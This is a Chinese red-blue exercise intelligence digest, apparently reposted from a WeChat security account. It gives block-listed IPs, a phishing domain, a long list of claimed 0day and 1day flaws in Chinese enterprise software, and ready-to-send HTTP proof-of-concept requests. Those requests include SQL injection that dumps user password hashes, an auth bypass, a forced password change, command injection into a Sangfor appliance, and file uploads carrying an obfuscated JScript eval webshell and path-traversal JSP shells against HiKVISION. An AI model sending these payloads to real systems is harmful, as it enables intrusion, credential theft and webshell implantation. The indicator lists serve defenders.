【攻防情报】关注实时整理8.10

admin 2023年8月12日01:59:31评论435 views字数 6703阅读22分20秒阅读模式


免责声明

Drt安全


poc 仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用此 poc。

由于传播、利用本公众号Drt安全战队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号Drt安全战队及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!



封禁ip

121.28.82.203  153.99.123.243 223.104.40.206 58.248.180.249 223.104.40.206172.174.8.243  213.32.122.82   223.104.42.11052.56.224.130  60.221.59.173  223.104.42.17760.223.233.250 65.49.20.117  223.104.41.119140.205.96.208 212.64.40.129 223.104.39.80

【攻防情报】关注实时整理8.10

钓鱼邮件

nuatdlh.cn

【漏洞总结】

1、海康威视综合安防前台文件上传漏洞

2、蓝凌OA前台代码执行漏洞

3、致远M3Server-xxxx反序列化漏洞

4、致远A8V8SP1SP2文件上传漏洞(1dav)

5、普元EOS 前台代码执行漏洞

6、金和OA sql注入

7、泛微E-Mobile任意用户登录(1day)

8、泛微E-Office10信息泄露后台+后台文件上传漏洞(Oday)很牛的组合漏洞

9、契约锁电子签章系统RCE(1day)

10、亿赛通电子文档平台文件上传漏洞

11、ldocview命令执行漏洞

12、jeesite代码执行漏洞Oday

13、LiveBOS文件上传漏洞

14、用友nc-cloud-任意文件写入

15、qax VPN 0day

16、xxIOA PWN

17、xxx准入PWN

18、sxf应用交付系统命令执行

19、协同办公文档(DzzOfffice)未授权访问

20、电子签章平台代码执行漏洞

21、泛微oa进后台漏洞

22、ucloud的未授权获取任意用户cookie

23、飞书客户端RCE漏洞

24、泛微EofficeV10前台RCE

25、来客推商城任意文件上传

26、天玥堡垒机Oday

27、明御运维审计与风险控制系统堡垒机任意用户注册28、协同管理系统存在SQL注入

29、泛微emobile注入漏洞30、拓尔思WCM任意命令执行漏洞

31、用友财务云任意文件上传漏洞

32、天眼0day(未证实)

33、绿盟sas安全审计系统任意文件读取

34、Smartbi身份认证绕过漏洞

35、泛微Eoffice10 sql注入

36、海康综合安防平台-Spring-ENV信息泄露-Restful api默认密钥漏洞

37、宏景4个注入2个上传

38、红帆OA一堆0day

39、泛微E-office do_excel组件存在任意文件写入漏洞

40、某御 Leadsec ACM管理平台SQL注入漏洞

41、H3C CVM 前台任意文件上传漏洞

42、通达OA登录认证绕过漏洞

43、TRS-MAS 测试文件远程命令执行漏洞

44、宝塔前台远程代码执行漏洞

45、某恒数据大脑 API 网关任意密码重置漏洞

46、通达OA系统V11.x版本远程代码执行漏洞

47、华天动力OA系统前台任意文件上传漏洞

48、PbootCMS v3.1.2 远程命令执行漏洞

49.金蝶OA云星空kdsvc远程命令执行漏洞

50.HiKVISION综合安防管理平台files任意文件上传漏洞

51.网神SecGate 360__0防火墙obj_app_upfile任意文件上传漏洞

52.网神SecSSL3600安全接入网关系统未授权访问 漏洞

53.用友移动管理系统uploadApkdo任意文件上传漏洞

Hillstone LMS 系统命令执行漏洞

天翼云网页防篡改系统命令执行漏洞

致远 OA 系统命令执行漏洞

致远0A 系统 V5-V6 模块命令执行漏洞

山石网科 BDR 系统 PHP 模块命令执行漏洞

H3C NX54 系统 web 模块信息泄露漏洞

镜捷 BG 易网关系统 patch. php 模块命令执行漏洞

H3C 虚拟授权管理系统系统 queryip模块命令执行漏洞

H3C 虚拟授权管理系统系统 web 模块命令执行漏洞

H3C综合日志审计平台系统webservice 模块命令执行漏洞

Logbase 堡垒机系统web 模块 SQL 注入漏洞

铣捷EG 易网关系统命令执行漏洞

镜捷 RG-UAC-6000-ISG 系统命令执行漏洞

镜捷云办公主机系统鉴权绕过模块命令执行漏洞

达云一卡通系统文件上传漏洞

1. 泛微 E-Cology 8、9SQL注入漏洞 POC

2. 金和OAC6-GetSqlData.aspxSQL注入漏洞

3. 用友畅捷通T+ SQL注入漏洞

4. ⻜企互联OA文件读取

5. 浪潮交易平台0day

6. 瑞友天翼应用虚拟化系统SQL注入漏洞

7. GitLab目录遍历漏洞

8. 猎鹰安全科技终端安全系统SQL注入漏洞XVE

9. 泛微E-Mobile6messageType.dosql注入

10. nginxWebUI

11. Net-NTLMv2窃取漏洞

12. Metabase未授权JDBC远程代码执行漏洞

13. 正方RCE

14. 正元EOS /default/jmx.jmx 反序列化

15. 正元EOS /default/remote.remote 反序列化

16. 锐捷 RG 系列路由器后台命令执行漏洞

17. 亿赛通任意文件写入0day

18. 大华智慧园区综合管理平台 deleteFtp 接口远程命令执行漏洞

19. 畅捷通T+ GetStoreWarehouseByStore RCE

20. 大华智慧园区任意密码读取漏洞

21. 泛微 sql 注入漏洞2

22. 用友时空 KSOA TaskRequestServlet sql 注入漏洞

23. 金蝶 K3ERP 系统 CusShareService SQL 注入

24. 用友时空 KSOA TaskRequestServlet sql 注入漏洞

25. 金和 OA C6 GetSqlData.aspx SQL注入漏洞

  请各单位密切关注并及时采取相应措施以确保系统和数据的安全。

223.104.39.80

223.104.40.206223.104.40.206223.104.40.206

禅道 16.5 router.class.php SQL注入漏洞

POST /user-login.html      account=admin%27+and+%28select+extractvalue%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%29%29%23

辰信景云终端安全管理系统 login SQL 注入漏洞 POC

POST /api/user/logincaptcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)


汉得 SRM tomcat.jsp 登录绕过漏洞 POC

/tomcat.jsp?dataName=role_id&dataValue=1/tomcat.jsp?dataName=user_id&dataValue=1



网神 SecSSL 3600 安全接入网关系统 任意密码修改漏洞 POC

POST /changepass.php?type=2 
Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff;
last_step_param={"this_name":"test","subAuthId":"1"}old_pass=&password=Test123!@&repassword=Test123!@


网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞 POC

POST /?g=obj_app_upfile HTTP/1.1Host: x.x.x.xAccept: */*AcceptEncoding: gzip, deflateContent-Length: 574Content-Type: multipart/formdata; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQcUser-Agent: 
Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data;
name="MAX_FILE_SIZE"10000000------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition:
form-data; name="upfile"; filename="vulntest.php"Content-Type:
text/plain<?php php 马?>------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data;
name="submit_post"obj_app_upfile------WebKitFormBoundaryJpMyThWnAxbcBBQcContentDisposition: form-data; name="__hash__"0b9d6b1ab7479ab69d9f71b05e0e9445------WebKitFormBoundaryJpMyThWnAxbcBBQc--


深信服应用交付系统命令执行漏洞 POC

POST /rep/loginHost:10.10.10.1:85
clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=

广联达oa sql注入漏洞 POC

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1Host: xxx.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 88
dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

广联达oa 后台文件上传漏洞 POC

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1Host: 10.10.10.1:8888X-Requested-With: Ext.basexAccept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: zh-Hans-CN,zh-Hans;q=0.5User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELjAccept: */*Origin: http://10.10.10.1Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40Cookie: Connection: closeContent-Length: 421
------WebKitFormBoundaryFfJZ4PlAZBixjELjContent-Disposition: form-data; filename="1.aspx";filename="1.jpg"Content-Type: application/text
<%@ Page Language="Jscript" Debug=true%><%var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';var GFMA=Request.Form("qmq1");var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);eval(GFMA, ONOQ);%>
------WebKitFormBoundaryFfJZ4PlAZBixjELj--

HiKVISION 综合安防管理平台 files 任意文件上传漏洞 POC

POST /center/api/files;.html HTTP/1.1Host: 10.10.10.10Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
------WebKitFormBoundary9PggsiM755PLa54aContent-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"Content-Type: application/zip
<%jsp的马%>------WebKitFormBoundary9PggsiM755PLa54a--

HiKVISION 综合安防管理平台 report 任意文件上传漏洞 POC

POST /svm/api/external/report HTTP/1.1Host: 10.10.10.10Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
------WebKitFormBoundary9PggsiM755PLa54aContent-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"Content-Type: application/zip
<%jsp的马%>
------WebKitFormBoundary9PggsiM755PLa54a--


关注不迷路


原文始发于微信公众号(Drt安全战队):【攻防情报】关注实时整理8.10

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月12日01:59:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【攻防情报】关注实时整理8.10https://cn-sec.com/archives/1951245.html

发表评论

匿名网友 填写信息